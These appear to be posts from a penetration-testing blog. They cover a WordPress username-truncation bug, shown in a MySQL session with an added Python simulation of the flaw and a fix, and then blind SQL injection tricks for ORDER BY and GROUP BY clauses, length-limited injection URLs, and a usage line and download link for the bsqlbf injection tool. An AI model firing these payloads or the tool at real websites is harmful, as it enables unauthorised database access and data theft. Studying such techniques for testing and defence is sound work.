NotSoSecure became slightly more secure with the new WordPress update.
This update is highly recommended if your WordPress installation allows user registration.
It's amazing how many vulnerabilities have been identified in WordPress over the years, and I wonder how many are yet to come.
I wonder how many web sites will get affected because of this issue. Stefan Esser has a great write-up here and the WordPress exploit is here.
The following may help you understand this issue better:
mysql> create table users (username varchar(10), password varchar(20));
Query OK, 0 rows affected (0.12 sec)
mysql> insert into users values('admin','Passw0rd');
Query OK, 1 row affected (0.02 sec)
mysql> select * from users where username ='admin';
+----------+----------+
| username | password |
+----------+----------+
| admin    | Passw0rd |
+----------+----------+
1 row in set (0.01 sec)
mysql> insert into users values('admin a','Passw0rd');
Query OK, 1 row affected, 1 warning (0.00 sec)
mysql> select * from users where username ='admin';
+------------+----------+
| username   | password |
+------------+----------+
| admin      | Passw0rd |
| admin      | Passw0rd |
+------------+----------+
2 rows in set (0.00 sec)
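The session above relies on two MySQL behaviours: in non-strict sql_mode an over-length value is cut to the column width with only a warning, and under a PAD SPACE collation trailing spaces are ignored when strings are compared. The following added example (not code from the original post or from WordPress) simulates both on a varchar(10) column and shows a registration check that refuses input the database would silently alter; the padded username it feeds in is constructed.

```python
from __future__ import annotations
from dataclasses import dataclass, field

COLUMN_WIDTH = 10  # varchar(10), as in the session above


def mysql_store(value: str, width: int = COLUMN_WIDTH) -> tuple[str, bool]:
    """Store like non-strict MySQL: over-length input is cut to the column
    width and only a warning is raised. Returns (stored_value, warned)."""
    if len(value) > width:
        return value[:width], True
    return value, False


def mysql_equal(a: str, b: str) -> bool:
    """Compare like a PAD SPACE collation: trailing spaces do not count."""
    return a.rstrip(" ") == b.rstrip(" ")


@dataclass
class UserTable:
    rows: list[str] = field(default_factory=list)

    def insert_unchecked(self, username: str) -> bool:
        """The vulnerable path: insert whatever the form sent."""
        stored, warned = mysql_store(username)
        self.rows.append(stored)
        return warned

    def lookup(self, username: str) -> list[str]:
        return [r for r in self.rows if mysql_equal(r, username)]

    def register(self, username: str) -> bool:
        """Hardened path: reject input the database would truncate or pad,
        and anything that compares equal to an existing account."""
        if username != username.strip() or len(username) > COLUMN_WIDTH:
            return False
        if any(mysql_equal(r, username) for r in self.rows):
            return False
        self.rows.append(username)
        return True


def demo() -> tuple[int, bool]:
    padded = "admin" + " " * 6 + "x"   # constructed: 12 chars, truncates to 'admin     '
    vulnerable = UserTable(["admin"])
    vulnerable.insert_unchecked(padded)
    hits = len(vulnerable.lookup("admin"))  # 2: the new row now matches 'admin'
    hardened = UserTable(["admin"])
    rejected = not hardened.register(padded)
    return hits, rejected
```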
Exploiting SQL injections when the input goes into the ORDER BY clause is a bit tricky, as UNION queries are not permitted after the ORDER BY clause. The following could be used in such a scenario to form blind SQL injection cases:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)
----
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
----
For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above will also work for blind injection cases:
mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
Often, while exploiting SQL injections, one encounters restrictions on the length of input a vulnerable parameter can take, e.g.
- http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- works
- http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- may not work (too long)
One solution to this problem could be:
- http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
- http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'--
- http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--
Thanks Ferruh for the help
Bsqlbf was originally written by A. Ramos from www.514.es and was intended to exploit blind SQL injection against a MySQL backend database. This is a modified version of the same tool. It supports blind SQL injection against the following databases:
MS-SQL
MySQL
PostgreSQL
Oracle
It supports injection in string and integer fields. The feature that separates this tool from all other SQL injection tools is that it supports custom SQL queries supplied with the -sql switch.
It supports two modes of attack (-type):
Type 0: Blind SQL injection based on true and false responses
Type 1: Blind SQL injection based on true and error responses (details)
Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip
Send your feedback/suggestions to sid-at-notsosecure(dot)com